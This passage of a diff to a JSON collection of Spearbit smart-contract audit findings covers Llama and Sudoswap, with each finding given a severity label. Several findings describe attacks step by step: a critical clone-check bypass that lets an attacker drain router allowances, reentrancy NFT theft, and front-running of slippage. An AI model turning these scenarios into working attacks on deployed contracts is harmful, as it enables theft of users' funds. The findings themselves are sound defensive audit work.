_fee, ...) external payable { ... require(_fee < MAX_FEE, \"Trade fee must be less than 100%\"); // 100% should be 90% ... ,! } function changeFee(uint256 newFee) external onlyOwner { ... require(newFee < MAX_FEE, \"Trade fee must be less than 90%\"); ... }", + "title": "Global guards are not supported", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Other protocols use of guards applies them to the account (i.e. globally). In other words, if global guards existed and if there are some properties you know to apply to the entire LlamaCore instance a global guard could be applied. The current implementation allows granular control, but it also requires granular control with no ability to set global guards.", "labels": [ "Spearbit", - "Sudoswap", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Consider using _disableInitializers in constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin added the _disableInitializers() in 4.6.0 which prevents initialization of the im- plementation contract and recommends its use.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Revoking and setting a role edge cases", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "This issue highlights a number of edge-case behaviors 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_- HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): Alice is given role 1 with expiry. Expiry passes. Anyone calls revokeExpiredRole. Role is revoked but Alice still has balanceOf == 1. LlamaCore later calls revokePolicy with roles array of [2]. A role Alice never had is revoked. The NFT is burned.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Use built in string.concat", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...). The client notes there are no gas implications of this change while the change does offer semantic clarity.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Inconsistencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Throughout the codebase, we've encountered some inconsistencies that we decided to point out. for(uint256 i = 0... is not used everywhere e.g. AbsoluteStrategy.sol#L130 Sometimes, a returned value is not named. e.g. named return value function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { unnamed return value function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { Missing NatSpec on various functions. e.g. LlamaPolicy.sol#L102 _uncheckedIncrement is not used everywhere. Naming of modifiers In all contracts the onlyLlama modfiier only refers to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry which has the same name but refers to llamaCore and rootLlama but is called onlyLlama. See LlamaPolicyMetadataParamRegistry.sol#L16 Console.log debug output in RelativeStrategy console.log in RelativeStrategy See: RelativeStrat- egy.sol#L215 In GovernanceScript.sol both of SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs over inheriting all structs from lib/Structs.sol: LlamaAccount GovernanceScript LlamaPolicy Recommend removing duplicate structs and, where relevant, continue making use of the shared Structs.sol for struct definitions.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Policyholders with large quantities may not both create and exercise their large quantity for the same action", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "The roleBalanceCheckpoints can run out of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This check will copy into memory the whole history which can end up in a out of gas error. This is an informational issue as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit.", + "labels": [ + "Spearbit", + "Llama", "Severity: Informational" ] }, { - "title": "Inaccurate comment for assetRecipientNFTBalanceAtTransferStart", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The comment in LSSVMPair notes that assetRecipientNFTBal- anceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate. // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred ,! // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken. ,! uint256 internal `assetRecipientNFTBalanceAtTransferStart`; function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... assetRecipientNFTBalanceAtTransferStart = 1; ... } 42", + "title": "GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPol- icy.revokeExpiredRole from EOA", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "GovernanceScript.revokeExpiredRoles is intended to be delagate called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call directly from an EOA or batching a multicall, again from an EOA.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "The InvalidActionState can be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Currently, the InvalidActionState includes the expected state as an argument, this is unnecessary as you can derive the state from the method call, would make more sense to take the current state instead of the expected state.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "_uncheckedIncrement function written in multiple contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", + "body": "Multiple contracts make use of an _uncheckedIncrementfunction and each duplicates the function definition. Similarly the slot0 function appears in both LlamaAccount and LlamaCore and _toUint64 appears in the two strategy contracts plus LlamaCore.", + "labels": [ + "Spearbit", + "Llama", + "Severity: Informational" + ] + }, + { + "title": "Clones with malicious extradata are also considered valid clones", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the rst 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the rst 54 bytes of proxy code but have a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), \"Target must be whitelisted\"); (bool result, ) = target.call{value: 0}(data); require(result, \"Call failed\"); ,! } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), \"Not pair\"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the rst 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: 5 function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return ,! LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. Now the malicious pair is considered valid, the require statement in pair- TransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Critical Risk" + ] + }, + { + "title": "Factory Owner can steal user funds approved to the Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent 6 router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, that can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by rst being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: High Risk" + ] + }, + { + "title": "Missing check in the number of Received Tokens when tokens are transferred directly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the rst method via router.pairTrans ferERC20From() a check is performed on the number of received tokens. In the second method no checks are done. Recent hacks (e.g. Qubit nance) have successfully exploited safeTransfer- From() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be dif- ferent from the amount requested to be transferred. 7 function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...) // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == ,! inputAmount, \"ERC20 not transferred in\"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious assetRecipient could get an unfair amount of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The function _swapNFTsForToken() of LSSVMRouter calls safe- TransferFrom(), which then calls ERC721Received of assetRecipient. A ma- licious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForTo- ken(). 8 function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } ,! ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "A malicious router could be whitelisted by an inattentive or a ma- licious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total bal- ance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. This function will compute total_balance 9 - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Malicious Router can steal NFTs via Re-Entrancy attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set is- Router to true. Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), they can re-enter the pair from the router and call swapTokenForAnyNFTs() again. This second time the function reaches router.pairTransferERC20From(), al- lowing the malicious router to execute a token transfer so that the require of _validateTokenInput is satised when the context returns to the pair. When the context returns from the reentrant call back to the original call, the require of _validateTokenInput would still pass because the balance was cached be- fore the reentrant call. Therefore, an attacker will receive 2 NFTs by sending tokens only once.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. In that case the callback on- ERC721Received() will not be triggered and the idSet administration of LSSVM- PairMissingEnumerable will not be updated. This means that nft().balanceO f(address(this)); can be different from the elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail as idSet.at(i) for unregistered NFTs will fail. This can be used in a grieng attack. getAllHeldIds() in LSSVMPairMissingEnumerable: function getAllHeldIds() external view override returns (uint256[] memory) { uint256 numNFTs = nft().balanceOf(address(this)); // returns the registered + unregistered NFTs uint256[] memory ids = new uint256[](numNFTs); for (uint256 i; i < numNFTs; i++) { ids[i] = idSet.at(i); // will fail at the unregistered NFTs } return ids; ,! } The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. Risk is low because any additional NFTs making later calls to _sendAnyNFTsToRecipient() and _send- SpecificNFTsToRecipient() will fail. However, this might make it more difcult to troubleshoot issues. 11 function swapTokenForAnyNFTs(...) .. { ,! ... require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))),\"Ask for > 0 and <= balanceOf NFTs\"); ... _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail ... } function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); // '<' should be '<=' ... _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail ... ,! ,! } Note: The error string < balanceOf NFTs is not accurate.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "With NFT pools the protocol fees end up in assetRecipient instead of _factory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Assume a scenario where an NFT pool with assetRecipient set have the received funds sent directly to the assetRecipient. Now, suppose a user executes the swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair con- tract. The pair contract does not have any funds because they have been sent directly to the assetRecipient. So following this action the payProtocolFee() lowers the fees to 0 and sends this number to the _factory while fees end up at assetRecipient' instead of at the _factory. The fees then end up at assetRecipient instead of at the _factory. Note: The same issue occurs in swapTokenForAnyNFTs(). This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different. This issue occurs both when swapTokenForSpecificNFTs() is called di- rectly as well as indirectly via the LSSVMRouter. Although the pool fees are 0 with NFT pools, the factory fee is still present. Luckily, TRADE pools cannot have an assetRecipient as this would also create issues. 13 abstract contract LSSVMPair is Ownable, ReentrancyGuard { ... function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) { ,! ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); // ,! sends inputAmount to assetRecipient _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); _refundTokenToSender(inputAmount); _payProtocolFee(_factory, protocolFee); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { ... function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairTokenBalance = _token.balanceOf(address(this)); if (protocolFee > pairTokenBalance) { protocolFee = pairTokenBalance; } _token.safeTransfer(address(_factory), protocolFee); // tries to send from the Pair contract } ,! } abstract contract LSSVMPairETH is LSSVMPair { function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override { ,! ... uint256 pairETHBalance = address(this).balance; if (protocolFee > pairETHBalance) { protocolFee = pairETHBalance; } payable(address(_factory)).safeTransferETH(protocolFee); // tries to send from the Pair contract } ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Error codes of Quote functions are unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The error return values from functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error==CurveErrorCodes.Err or.OK. abstract contract LSSVMPair is Ownable, ReentrancyGuard { ,! ,! ,! ... function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) { (error, ...) = bondingCurve().getSellInfo(...); } function swapTokenForAnyNFTs(...) (uint256 inputAmount) { external payable virtual returns ... (error, ...) = _bondingCurve.getBuyInfo(...); require(error == CurveErrorCodes.Error.OK, \"Bonding curve error\"); ... } } LSSVMRouter.sol#L526 (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...); The following contract lines contain the same code snippet below: LSSVMRoute r.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.so l#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664 (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...); Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. However, future Curve contracts might add additional error codes.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Medium Risk" + ] + }, + { + "title": "Swaps can be front run by Pair Owner to extract any prot from slippage allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "If the user adds a nonzero slippage allowance, the pair owner can front run the swap to increase the fee/spot price and steal all of the slippage allowance. This basically makes sandwich attacks much easier and cheaper to execute for the pair owner.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Add check for numItems == 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check. 17 contract LinearCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // We only calculate changes for buying 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } function getSellInfo(...) ... { // We only calculate changes for selling 1 or more NFTs if (numItems == 0) { return (Error.INVALID_NUMITEMS, 0, 0, 0); } ... } } contract ExponentialCurve is ICurve, CurveErrorCodes { function getBuyInfo(...) ... { // No check on `numItems` uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD); ... } function getSellInfo(... ) ... { // No check on `numItems` uint256 invDelta = ,! FixedPointMathLib.WAD.fdiv(delta,FixedPointMathLib.WAD); ... } } If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 then result outputValue of the functions in Expo- nentialCurve is still 0, so there is no real issue. However, it is still important to x this because a derived version of these functions might be used by future developers.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Disallow arbitrary function calls to LSSVMPairETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairETH contains an open fallback() func- tion. The fallback() is most likely necessary because the proxy adds calldata and the receive() function, therefore not receiving the ETH. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforseen scenarios which hackers could potentially exploit. fallback() external payable { emit TokenDeposited(msg.value); }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Only transfer relevant funds for PoolType", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes. 19 function _initializePairETH(...) ... { ... // Transfer initial `ETH` to `pair` // Only relevant for `PoolType.TOKEN` or `PoolType.TRADE` payable(address(_pair)).safeTransferETH(msg.value); ... // Transfer initial `NFT`s from `sender` to `pair` for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } function _initializePairERC20(...) ... { ... // Transfer initial tokens to pair // Only relevant for PoolType.TOKEN or PoolType.TRADE _token.safeTransferFrom(msg.sender,address(_pair),_initialTokenBalance); ... // Transfer initial NFTs from sender to pair for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Check for 0 parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0 while the comparable function setRouterAllowed() does check for _router != 0. 20 function setCallAllowed(address payable target, bool isAllowed) external ,! onlyOwner { ... // No check on target callAllowed[target] = isAllowed; } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external ,! onlyOwner { ... // No check on bondingCurve bondingCurveAllowed[bondingCurve] = isAllowed; } function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner { require(address(_router) != address(0), \"0 router address\"); ... routerAllowed[_router] = isAllowed; ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Potentially undetected underow In assembly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly based calculation where the paramsLength is sub- tracted from calldatasize(). Assembly underow checks are disregarded and if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underow, resulting in the values for factory(), bondingCurve(), nft(), poolType(), and token() to be read from unexpected pieces of memory. This will be usually zeroed therefore execution will stop at some point. However, it is safer to prevent this from ever happening. 21 function factory() public pure returns (LSSVMPairFactoryLike _factory) { ... assembly {_factory := shr(0x60,calldataload(sub(calldatasize(), paramsLength)))} ,! } function bondingCurve() public pure returns (ICurve _bondingCurve) { ... assembly {_bondingCurve := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 20)))} ,! } function nft() public pure returns (IERC721 _nft) { ... assembly {_nft := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 40)))} ,! } function poolType() public pure returns (PoolType _poolType) { ... assembly {_poolType := shr(0xf8,calldataload(add(sub(calldatasize(), paramsLength), 60)))} ,! } function token() public pure returns (ERC20 _token) { ... assembly {_token := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 61)))} ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Check number of NFTs is not 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verication on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to re- turn a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero. Note: 1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen. This error code is not always checked. function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual ,! ,! returns (uint256 outputAmount) { ... // No check on `nftIds.length` (error, newSpotPrice, outputAmount, protocolFee) = nftIds.length,..); _bondingCurve.getSellInfo(..., ... } function routerSwapNFTsForToken(address payable tokenRecipient) ... { ,! ... uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart; ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...); ,! } function getSellNFTQuote(uint256 numNFTs) ... { ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs,...); ... ,! } 2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs. 23 function swapTokenForSpecificNFTs(uint256[] calldata nftIds,...) ... { ... //There is a check on the number of requested `NFT`s require( (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), \"Must ask for > 0 and < balanceOf NFTs\"); // check is present ... ,! ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk 22" + ] + }, + { + "title": "Avoid utilizing inside knowledge of functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "ETH based swap functions use isRouter==false and router- Caller==address(0) as parameters to swapTokenForAnyNFTs() and swapToken- ForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router so functionally isRouter should be true. Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios: 24 function robustSwapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function robustSwapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... ,! } function _swapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function _swapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: ,! pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... } function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... ,! } abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(..., bool, /*isRouter*/ /*routerCaller*/ ... ) { address, // doesn't use isRouter and routerCaller } ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Add Reentrancy Guards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The abovementioned permalinks and corresponding functions are listed for Sudoswaps consideration to introduce reentrancy guard modiers. Currently, there is only one function that uses a reentrancy guard modier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modiers. We have only seen reentrancy problems when malicious routers, assetRecip- ients, curves, factory owner or protocolFeeRecipient are involved. Despite normal prohibitions on this occurence, it is better to protect ones codebase than regret leaving open vulnerabilities available for potential attackers. There are three categories of functions that Sudoswap should consider applying reen- trancy guard modiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts). Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272 LSSVMPairETH.sol#L104 Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34 LSSVMPairETH.sol#L46 A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVM- PairFactory.sol#L428 LSSVMRouter.sol#L544", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Saving 1 byte off the constructor() code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The dup2 before the return in the code below indicates a possible optimization by rearranging the stack. function cloneETHPair(...) ... { assembly { ... | RETURNDATASIZE // 3d | PUSH1 runtime // 60 runtime | DUP1 // 80 // 60 creation | PUSH1 creation (c) // 3d // 39 | RETURNDATASIZE | CODECOPY ,! ,! ,! [0-2d]: runtime code // 81 | DUP2 [0-2d]: runtime code // f3 | RETURN [0-2d]: runtime code ... } } | 0 (r) | r 0 | r r 0 | c r r 0 | 0 c r r 0 | r 0 | 0 c 0 | 0 | | | | | | | |", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Decode extradata in calldata in one go", + "html_url": 